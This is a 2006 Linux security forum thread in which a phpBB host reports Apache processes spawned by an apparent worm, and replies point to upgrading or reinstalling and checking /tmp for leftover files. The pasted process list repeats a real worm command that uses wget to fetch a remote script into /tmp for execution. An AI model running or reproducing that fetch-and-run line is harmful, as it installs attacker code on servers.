LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 04-10-2006, 11:51 PM   #1
novice06
Member
 
Registered: Mar 2006
Location: Singapore
Distribution: RHEL, CentOS
Posts: 132

Rep: Reputation: 23
Apache problem


Hi,

My Apache is running on Redhat 9.
Apache is daily by daily memory out. not down.
I think memory is consumed by other processes.
This process is not by me.

28673 apache 4164 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28743 apache 4164 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28900 apache 4164 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29059 apache 4164 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28604 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28685 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28746 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29064 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29086 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29288 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29868 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...


these are some of that processes.
now my server memory is very rare.
I kill them but new threads are occur. so never end.

I trace this process. This source from PhpBB what i hosted.
I check my phpbb noone using is forum.

what should i do for this processes?

please send me suggestion.


Thanks,
novice06
 
Old 04-11-2006, 04:29 AM   #2
zeitounator
Member
 
Registered: Aug 2003
Location: Montpellier, France, Europe, World, Solar System
Distribution: Debian Sarge, Fedora core 5 (i386 and x86_64)
Posts: 262

Rep: Reputation: 30
In my opinion, this looks like you're victim of a worm attacking phpbb 2.0.10 and earlier... You should upgrade. See:
http://isc.sans.org/diary.php?date=2004-12-21
 
Old 04-11-2006, 04:52 AM   #3
novice06
Member
 
Registered: Mar 2006
Location: Singapore
Distribution: RHEL, CentOS
Posts: 132

Original Poster
Rep: Reputation: 23
suggest

Hi,

After i check my phpBB is 2.0.18, so no need to upgrade?
My problem is exactly the same as your doc.
But in these doc, not explain how to stop or remove.
Please suggest what should i carry on.

Thanks
novice06
 
Old 04-12-2006, 09:33 PM   #4
novice06
Member
 
Registered: Mar 2006
Location: Singapore
Distribution: RHEL, CentOS
Posts: 132

Original Poster
Rep: Reputation: 23
ok

Thanks,

your suggestion is great.
after i reinstall phpBB, problem solved.

novice06
 
Old 04-13-2006, 06:52 AM   #5
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Have you identified and removed the worm/script that was executing those commands? Looking at the requests, /tmp would be a good place to start. I'd also look for any files owned by "apache" outside the document root (find / -user apache).
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Strange apache trailing / problem - Slack-current, apache 1.3.33 vamp Linux - Networking 1 01-30-2005 07:28 PM
Apache Problem dfownz Linux - Software 2 05-08-2004 09:24 PM
RH9: PHP session problem (or Apache problem) fengcn Red Hat 0 12-01-2003 06:32 PM
perl problem? apache problem? cgi problem? WorldBuilder Linux - Software 1 09-17-2003 07:45 PM
apache benchmarks (apache v13 / apache v20) ; large differences between benchmarking markus1982 Linux - Software 0 02-08-2003 10:53 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 07:57 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration